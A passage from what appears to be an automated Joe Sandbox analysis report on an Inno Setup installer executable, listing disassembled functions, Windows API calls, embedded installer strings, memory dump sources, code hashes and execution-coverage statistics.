                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047B8D5,?,00000000,00000000,00000001,00000000,0047A301,?,00000000), ref: 0047A2C5
                                                                                Strings
                                                                                • Failed to parse "reg" constant, xrefs: 0047A2CC
                                                                                • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A139
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                • API String ID: 3535843008-1938159461
                                                                                • Opcode ID: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                                                • Instruction ID: 3bf0094b3715a844c7fa4d69accdb7e726d223c3dcefaf8b2e4f531663087c06
                                                                                • Opcode Fuzzy Hash: e0d6e35170bf7ee4b8178599f1d76f9c45a53d37f1d162d859c7bf4591e85c05
                                                                                • Instruction Fuzzy Hash: 5F814174E00149AFCB10DF95D881ADEBBF9EF48314F5081AAE814B7392D7389E05CB99
                                                                                Function 0048300C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483045
                                                                                • SetActiveWindow.USER32(?,00000000,00483196,?,00000000,004831D7,?,?,?,?,00000000,00000000,00000000,?,0046C0D1), ref: 00483057
                                                                                Strings
                                                                                • Will not restart Windows automatically., xrefs: 00483176
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveForeground
                                                                                • String ID: Will not restart Windows automatically.
                                                                                • API String ID: 307657957-4169339592
                                                                                • Opcode ID: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                                                • Instruction ID: df9a9ae9a8219d8b6a1298420550b74bcee7fa449f44545fa147fc9774bd32fa
                                                                                • Opcode Fuzzy Hash: f35973b3444d63abd30155c0fb60d5d87605f2a8390df662fe53ad2e28820558
                                                                                • Instruction Fuzzy Hash: A7413330208340AED710FFA4DC9AB6E3BA4DB15F05F1408B7E9404B3A2D6BD5A04DB1D
                                                                                Function 00402088 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,004021FC), ref: 004020CB
                                                                                  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                • String ID: x?m
                                                                                • API String ID: 296031713-3464419107
                                                                                • Opcode ID: 4b9225ab6ba6685e005fd9bf0415e9852399b88a9652eb18fdb70e0530e56136
                                                                                • Instruction ID: 30adadd309813d1a6846ca6b4958dbaac508113c784b73a5bb8d11bfdb372a30
                                                                                • Opcode Fuzzy Hash: 4b9225ab6ba6685e005fd9bf0415e9852399b88a9652eb18fdb70e0530e56136
                                                                                • Instruction Fuzzy Hash: 3941E3B2E00304DFDB10CF69EE8521A77A4F7A8324B15417FD854A77E2D3789801DB88
                                                                                Function 0046CEB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 89COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                • Failed to proceed to next wizard page; aborting., xrefs: 0046CFCC
                                                                                • Failed to proceed to next wizard page; showing wizard., xrefs: 0046CFE0
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
                                                                                • API String ID: 0-1974262853
                                                                                • Opcode ID: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                                                • Instruction ID: 63d40b18a6e87dbc706e62a2b7ed59e25ea13cd94e581da409b3f01416405f56
                                                                                • Opcode Fuzzy Hash: f8b0d9f73654ae948dfe63457d27392de8d2a8ebea4116114edd3800fcdd02ea
                                                                                • Instruction Fuzzy Hash: 9A319E30A08244DFD711EB99D989BA977F6EB05308F1500FBF0489B392D779AE40CB1A
                                                                                Function 00478DB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                • RegCloseKey.ADVAPI32(?,00478E9A,?,?,00000001,00000000,00000000,00478EB5), ref: 00478E83
                                                                                Strings
                                                                                • %s\%s_is1, xrefs: 00478E2C
                                                                                • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478E0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpen
                                                                                • String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                • API String ID: 47109696-1598650737
                                                                                • Opcode ID: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                                                • Instruction ID: 403b8390735a8e98fed73365c843d129082673b7d0193522817cb9849c55968d
                                                                                • Opcode Fuzzy Hash: 3c218534b7aea35313477da1420f505f75d4b79f6803eaf18b753309f41f968f
                                                                                • Instruction Fuzzy Hash: 79218470B40208AFDB01DFAACC55A9EBBE8EB48304F90847EE904E7381DB785D018A59
                                                                                Function 00450154 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501E9
                                                                                • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045021A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ExecuteMessageSendShell
                                                                                • String ID: open
                                                                                • API String ID: 812272486-2758837156
                                                                                • Opcode ID: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                                                • Instruction ID: 6e2feb9b457cb976a84d54f3b3258ed3b08e14d6ba220cef3ebd8abcd6e201e4
                                                                                • Opcode Fuzzy Hash: adeb5e276340ad6fa3d53176e38ffb5e58c1499704c489fbf40d86a9362c05b3
                                                                                • Instruction Fuzzy Hash: 62219474E40208AFDB00DFA5C886B9EB7F8EB44705F2081BAB514E7282D7789E05CB58
                                                                                Function 0045527C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 00455318
                                                                                • GetLastError.KERNEL32(0000003C,00000000,00455361,?,?,00000001,00000001), ref: 00455329
                                                                                  • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                • String ID: <
                                                                                • API String ID: 893404051-4251816714
                                                                                • Opcode ID: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                                                • Instruction ID: ea799879bbb6ab716a70283d096866571a468ac1fa4b8cc73728b10af3e72d10
                                                                                • Opcode Fuzzy Hash: 57012810d142c3df1a5160bec437aa7c33a0c7c828d826884eb3f35a8728d1b1
                                                                                • Instruction Fuzzy Hash: 02215370A00609ABDB10DFA5D8926AE7BF8AF18355F50443AFC44E7281D7789949CB58
                                                                                Function 00402584 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                • String ID: )
                                                                                • API String ID: 2227675388-1084416617
                                                                                • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                Function 004964FE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 66COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496539
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Window
                                                                                • String ID: /INITPROCWND=$%x $@
                                                                                • API String ID: 2353593579-4169826103
                                                                                • Opcode ID: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                                                • Instruction ID: 8ac61a852f64af84e8a4d996ffe215da0ea6a1f7c0dd4c2642a2787a2d41e8fe
                                                                                • Opcode Fuzzy Hash: 552611a81f91654fc44d41bb0f0c519a98a2c07263e337a61ce07e3eab6c417a
                                                                                • Instruction Fuzzy Hash: C711A531A043089FDB01DF64E855BAE7BE8EB48324F52847BE404E7281DB3CE905CA58
                                                                                Function 00447424 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                • SysFreeString.OLEAUT32(?), ref: 004474D6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: String$AllocByteCharFreeMultiWide
                                                                                • String ID: NIL Interface Exception$Unknown Method
                                                                                • API String ID: 3952431833-1023667238
                                                                                • Opcode ID: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                                                • Instruction ID: aafd2560cbf8ba646f5ae6954b41d26adab4393ec7197c17a1bba45f9511721b
                                                                                • Opcode Fuzzy Hash: 258d3c6477c64922ebec54d5f4264d59c03dbf12c3c57b46792931bb3fd1eaaf
                                                                                • Instruction Fuzzy Hash: 0811D6306042049FEB10DFA59D42A6EBBACEB49704F91403AF504E7681C7789D01CB69
                                                                                Function 0042DD74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD88
                                                                                • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDC8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Value$EnumQuery
                                                                                • String ID: Inno Setup: No Icons
                                                                                • API String ID: 1576479698-2016326496
                                                                                • Opcode ID: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                                                • Instruction ID: 05ef73584c9e0c756a5fead926ccd29af3c260b6948a855c27afe474e1c18ecb
                                                                                • Opcode Fuzzy Hash: e0e38617d7780f69d75f26860b1501b2527d54a68fe4bf3310a8a6dfd5a7631c
                                                                                • Instruction Fuzzy Hash: B2012B36F5A77179F73046256D02BBB56888B82B60F68453BF940EA2C0D6589C04C36E
                                                                                Function 00497234 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004555D0: GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                                  • Part of subcall function 004555D0: OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                                • SetForegroundWindow.USER32(?), ref: 00497266
                                                                                Strings
                                                                                • Restarting Windows., xrefs: 00497243
                                                                                • Not restarting Windows because Uninstall is being run from the debugger., xrefs: 00497291
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CurrentForegroundOpenTokenWindow
                                                                                • String ID: Not restarting Windows because Uninstall is being run from the debugger.$Restarting Windows.
                                                                                • API String ID: 3179053593-4147564754
                                                                                • Opcode ID: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                                • Instruction ID: f042dff5c045186d33be5417afa4f05d679b9763972d2bb00463d131ea403ed4
                                                                                • Opcode Fuzzy Hash: 699fd1f27132e499a72d678966239612eac8b61dfe9d57f4c88cf0c32b356d0f
                                                                                • Instruction Fuzzy Hash: FD01D8706282406BEB00EB65E981B9C3F99AB5430CF5040BBF900A72D3D73C9945871D
                                                                                Function 004979D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0047CD84: FreeLibrary.KERNEL32(70020000,004814B7), ref: 0047CD9A
                                                                                  • Part of subcall function 0047CA54: GetTickCount.KERNEL32 ref: 0047CA9E
                                                                                  • Part of subcall function 004570CC: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004570EB
                                                                                • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049832B), ref: 00497A29
                                                                                • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049832B), ref: 00497A2F
                                                                                Strings
                                                                                • Detected restart. Removing temporary directory., xrefs: 004979E3
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                • String ID: Detected restart. Removing temporary directory.
                                                                                • API String ID: 1717587489-3199836293
                                                                                • Opcode ID: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                                • Instruction ID: 93f06bea8fcfa1b224d7ac257058da4e76460d04d1e35911cc499d3d1c0dfa98
                                                                                • Opcode Fuzzy Hash: e611eeaa9fed28cadb8c69ef2edffd8a52967f1f4ce985551ff58b7f7fd4f302
                                                                                • Instruction Fuzzy Hash: 51E0553120C3002EDA02B7B2BC52A2F7F8CD701728311083BF40882452C43D1810C77D
                                                                                Function 00455660 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.3335523168.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.3335495837.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335812100.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335840763.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335868651.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000002.00000002.3335892523.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_2_2_400000_N6jsQ3XNNX.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLastSleep
                                                                                • String ID:
                                                                                • API String ID: 1458359878-0
                                                                                • Opcode ID: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                                                • Instruction ID: a2606c7dd4c17da0a3c90c20a229de96912268129783a4208f21052e6a4fbdd3
                                                                                • Opcode Fuzzy Hash: 11e49af8eca5aab8e77903997d46822470632a6293514e89f51700c73713890d
                                                                                • Instruction Fuzzy Hash: 62F02436B01D64578F20A59E998193F63DDEA94376750013BFC0CDB303D438CC098AA9

                                                                                Execution Graph

                                                                                Execution Coverage:12.1%
                                                                                Dynamic/Decrypted Code Coverage:83.9%
                                                                                Signature Coverage:4%
                                                                                Total number of Nodes:2000
                                                                                Total number of Limit Nodes:34
